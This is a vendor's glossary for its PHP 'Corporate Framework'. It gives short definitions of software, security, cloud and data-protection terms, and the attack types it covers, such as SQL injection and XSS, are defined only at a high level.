Glossary
This page is a living reference, designed to define and explain the key concepts, technologies, and principles that constitute the Corporate Framework and our ecosystem. Use it to gain a deeper understanding of the terms we use across our platform and documentation.
A
Access Control
The selective restriction of access to a resource. It is the core security discipline that controls who can do what. Our Access Management feature is a powerful tool for implementing robust access control policies.
Access Management
The process of controlling which users have access to which data and features within an application. Our system is built on Roles and Permissions to provide granular control.
Agile Development
An iterative approach to project management and software development that helps teams deliver value to their customers faster. It emphasizes adaptive planning, evolutionary development, and continuous improvement.
Anonymization
The process of removing or modifying personally identifiable information (PII) from data so that the people whom the data describe remain anonymous and cannot be re-identified.
API (Application Programming Interface)
A set of rules and tools that allows different software programs to communicate with each other. Our "API-first" architecture means all Framework functions are accessible to other systems, enabling deep integration and automation.
Attack Surface
The sum of the different points ("attack vectors") where an unauthorized user can try to enter or extract data from an environment. Our goal is to minimize the attack surface of the Framework.
Authentication
The process of verifying a user's identity, typically by checking a username and password.
Authorization
The process of determining whether an authenticated user has permission to perform a specific action or access specific data.
Audit Trail
A chronological and immutable log of all actions and events within a system. An audit trail is essential for security, compliance, and debugging.
B
Backend
The part of a software application that runs on the server and is invisible to the end-user. The backend handles database logic, business processes, and communication with other systems.
Beta Version
An early, nearly complete version of software released to a limited group (e.g., Certified Developers) to test new features and find bugs before the final release.
Breach (Data Breach)
A security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual unauthorized to do so.
Brute-Force Attack
A trial-and-error method used to obtain information such as a user password by exhaustively trying all possible combinations.
Bug
An error, flaw, or fault in a computer program that causes it to produce an incorrect or unexpected result.
C
Cache
A temporary data store used to speed up data retrieval and improve application performance. Our framework uses Redis for efficient caching.
CCPA/CPRA (California Consumer Privacy Act / California Privacy Rights Act)
A state-wide data privacy law in California that grants consumers more control over the personal information that businesses collect about them.
CDN (Content Delivery Network)
A network of servers located around the world used to quickly deliver static content like images, videos, and documents to users, regardless of their geographical location.
Certified Developer
A professional developer who has completed and passed Corporate's official certification program, which is a requirement for obtaining a Developer License.
CIA Triad (Confidentiality, Integrity, Availability)
A foundational model for guiding information security policies. Confidentiality ensures data is accessible only to authorized users. Integrity ensures data is accurate and trustworthy. Availability ensures data is accessible when needed.
Cloud-Native
An approach to building and running applications that fully leverages the advantages of cloud computing. Our framework is designed to be cloud-native and easily deployed in containers.
Compliance
The process of ensuring that a company or system adheres to applicable laws, regulations, and standards (e.g., data protection regulation, ISO 27001).
Consent (data protection regulation)
A freely given, specific, informed, and unambiguous indication of a data subject's wishes by which they signify agreement to the processing of personal data relating to them. One of the lawful bases for processing data.
Containerization
A method of packaging an application's code and all its dependencies into a single, isolated unit called a 'container' (typically with Docker). This ensures the application runs uniformly across all environments.
Cron Job
A time-based task scheduled to run automatically at a specific time or interval. Used in our Operations module to automate processes like nightly reports.
Cryptography
The practice and study of techniques for secure communication in the presence of third parties. It is the basis for Encryption.
CSRF (Cross-Site Request Forgery)
A type of attack that tricks a legitimate user into submitting a malicious request. Our framework has built-in protection against CSRF.
Cybersecurity
The practice of protecting systems, networks, and programs from digital attacks.
D
Dashboard
A visual user interface that provides a central overview of key performance indicators (KPIs) and data in an application.
Database
An organized collection of data that an application can access and manage.
Data Controller
Under the data protection regulation, the entity that determines the purposes and means of processing personal data. When a business uses a Solution built on our framework to manage their customer information, the business is the Data Controller.
Data Minimization
A principle of the data protection regulation stating that personal data collected should be adequate, relevant, and limited to what is necessary in relation to the purposes for which they are processed.
Data Portability
A right under the data protection regulation that allows individuals to obtain and reuse their personal data for their own purposes across different services.
Data Processor
Under the data protection regulation, the entity that processes personal data on behalf of the data controller. In the context of our platform, Corporate acts as the Data Processor.
Data Processing Agreement (DPA)
A legally binding agreement between a data controller and a data processor, required by the data protection regulation.
Developer Hub
Our private online portal exclusively for Certified Developers.
Digital Signature
A cryptographic method for validating the authenticity and integrity of a digital message or document.
Disaster Recovery
A set of policies and procedures to enable the recovery of technology infrastructure and systems following a natural or human-induced disaster. Our Backup feature is a key component of this.
DDoS (Distributed Denial-of-Service)
A malicious attempt to disrupt the normal traffic of a server or network by overwhelming the target with a flood of internet traffic.
Docker
The leading platform for Containerization.
DPIA (Data Protection Impact Assessment)
A process required by the data protection regulation to help identify and minimize the data protection risks of a new project or system.
Runtime License
The legal agreement that grants a company the right to use and operate a specific application built on the Corporate Framework.
E
Elasticsearch
A powerful, open-source search and analytics engine that drives the advanced Search functionality in our framework.
Encryption
The process of converting data into an unreadable code to protect it from unauthorized access. We use encryption both "in transit" (across networks) and "at rest" (when stored).
End-to-End Encryption (E2EE)
A secure communication method that prevents third-parties from accessing data while it's transferred from one end system to another.
Endpoint
A specific URL in an API where a particular function or resource can be accessed.
Enterprise Grade
A term used to describe software that is robust, scalable, and secure enough for use in large, business-critical organizations.
F
Firewall
A network security system that monitors and controls incoming and outgoing network traffic based on predefined security rules.
Framework
A reusable software platform that provides a basic foundation upon which developers can build applications.
Frontend
The part of an application that the user interacts with directly in the browser (design, layout, buttons).
G
GDPR (General Data Protection Regulation)
The EU's data protection and privacy law, which sets strict rules for the collection and processing of personal data.
Git
The most widely used modern Version Control system for tracking changes in source code during software development.
H
High Availability
A system's ability to operate continuously without failure for a long period of time.
Hosting
The service of making an application available on the internet by storing its files on a server.
I
i18n (Internationalization)
The technical process of designing software so that it can support different languages and regions.
IAM (Identity and Access Management)
A broad framework of policies and technologies for ensuring that the proper people have the appropriate access to technology resources.
IdP (Identity Provider)
A system that manages digital identities and user authentication. Our IdP is the central login service for all our portals.
Incident Response
An organized approach to addressing and managing the aftermath of a security breach or cyberattack.
Information Security
The practice of protecting information from unauthorized access, use, disclosure, disruption, modification, or destruction.
Integration
The process of connecting different software systems so they can exchange data and work together.
J
JSON (JavaScript Object Notation)
A lightweight, text-based format for data interchange that is easy for humans to read and for machines to parse. It is the standard format for most modern RESTful APIs.
K
Kubernetes (K8s)
An open-source platform for automating the deployment, scaling, and management of container-based applications.
L
l10n (Localization)
The actual process of adapting an internationalized software for a specific language and culture.
Lawful Basis for Processing
A requirement under the data protection regulation that all processing of personal data must be justified by one of six specific legal grounds (e.g., Consent, contract, legal obligation).
Load Balancing
The process of distributing network traffic across multiple servers to ensure that no single server becomes overwhelmed, thereby improving performance and reliability.
M
Malware
Malicious software designed to disrupt, damage, or gain unauthorized access to a computer system.
Man-in-the-Middle (MitM) Attack
An attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. HTTPS is the primary defense against this.
MFA (Multi-Factor Authentication)
A security method requiring a user to provide two or more verification factors to gain access to a resource.
Microservices
An architectural style that structures an application as a collection of small, independent services that communicate over APIs.
O
OWASP (Open Web Application Security Project)
A global non-profit organization focused on improving software security. Their "OWASP Top 10" is a recognized list of the most critical web application security risks.
P
Patch Management
The process of managing and applying updates (patches) to software to fix bugs or address security vulnerabilities.
Penetration Test (Pentest)
An authorized, simulated cyberattack on a computer system, performed to evaluate its security.
Personally Identifiable Information (PII)
Any data that can be used to identify a specific individual. The data protection regulation has a broad definition of what constitutes personal data.
Phishing
A type of social engineering attack often used to steal user data, including login credentials and credit card numbers.
PHP
The server-side scripting language that the Corporate Framework is built in.
PIPEDA (Personal Information Protection and Electronic Documents Act)
Canada's main federal privacy law for the private sector.
Principle of Least Privilege (PoLP)
A security concept requiring that a user be given only the minimum levels of access – or permissions – needed to perform their job functions.
Privacy by Design
An approach to systems engineering which states that privacy and data protection should be embedded throughout the entire lifecycle of a project. This is a core principle of our Framework.
Pseudonymization
A data de-identification procedure by which personally identifiable information fields are replaced by one or more artificial identifiers, or pseudonyms.
Q
Queue
A system used to manage background tasks. Tasks are placed in a queue and processed one by one by a "worker," preventing the user interface from slowing down. Used in our Operations module.
R
Ransomware
A type of Malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid.
RESTful API
An architectural style for APIs that uses standard HTTP methods. The most widespread standard for integrations.
Redis
An extremely fast in-memory database used for Caching and managing job queues.
Risk Assessment
The process of identifying, analyzing, and evaluating potential security risks.
S
SaaS (Software as a Service)
A software licensing and delivery model in which software is licensed on a subscription basis and is centrally hosted.
Scalability
A system's ability to handle a growing amount of work or users without a loss in performance.
Security Hardening
The process of securing a system by reducing its Attack Surface. This involves removing unnecessary software, accounts, or services.
SIEM (Security Information and Event Management)
A solution that helps organizations detect, analyze, and respond to security threats by collecting and correlating log data from multiple sources.
Social Engineering
A manipulation technique used to trick users into divulging confidential information. Phishing is a common example.
SQL Injection
A type of attack where a hacker inserts malicious SQL code into an input form to manipulate the database. Our framework automatically protects against this.
SSL/TLS (Secure Sockets Layer / Transport Layer Security)
The standard security technology for establishing an encrypted link between a web server and a browser, ensuring all data passed between them remains private. This is what enables HTTPS.
SSO (Single Sign-On)
An authentication method that allows a user to sign in with a single set of credentials to multiple independent software systems.
Subject Access Request (SAR)
A request made by an individual under the data protection regulation for the personal information an organization holds about them.
T
Tags
Flexible, user-defined labels that can be added to data (e.g., documents, customers) to organize and find them across different categories.
Terms of Service
The legal agreement that defines the rules and conditions for using a service.
Threat Actor
An entity that is partially or wholly responsible for an incident that impacts an organization's security.
Threat Modeling
A process by which potential threats can be identified, enumerated, and prioritized – all from a hypothetical attacker’s point of view.
Token
A piece of data that represents another piece of more sensitive data. Often used in authentication and API communication to securely transmit credentials.
Two-Factor Authentication (2FA)
A specific type of MFA that requires exactly two verification factors.
U
UI (User Interface)
The visual part of an application that a user interacts with.
Uptime
The measure of time a system has been operational and available. Often expressed as a percentage, e.g., "99.9% uptime."
UX (User Experience)
The overall experience a user has when interacting with an application, including how easy and pleasant it is to use.
V
Version Control
A system that tracks and manages changes to files over time (especially source code), allowing you to recall specific versions later. Git is the most common system.
Vulnerability
A weakness in a system that can be exploited by a Threat Actor to perform unauthorized actions.
Vulnerability Disclosure Program (VDP)
A formal program that provides a safe channel for external security researchers to report vulnerabilities to an organization.
W
Webhook
An automated way for applications to send notifications to each other in real-time. When a specific event occurs, the source application sends an HTTP message to a configured URL in the receiving application.
White Paper
An in-depth, authoritative document that illuminates a complex topic and presents a solution. Found in our Resource Library.
Whitelisting
The practice of explicitly allowing some identified entities (e.g., an email sender or an IP address) to access a particular service, while denying all others.
X
XSS (Cross-Site Scripting)
A type of security vulnerability where an attacker can inject malicious code (typically JavaScript) into a web page, which is then viewed by other users. Our framework automatically protects against this.
Z
Zero-Day Vulnerability
A software vulnerability that is discovered by attackers before the vendor has become aware of it or has had time to create a patch.
Zero Trust Architecture
A modern security model that operates on the principle of "never trust, always verify." It requires strict identity verification for every person and device trying to access resources on a network, regardless of whether they are sitting inside or outside the network perimeter.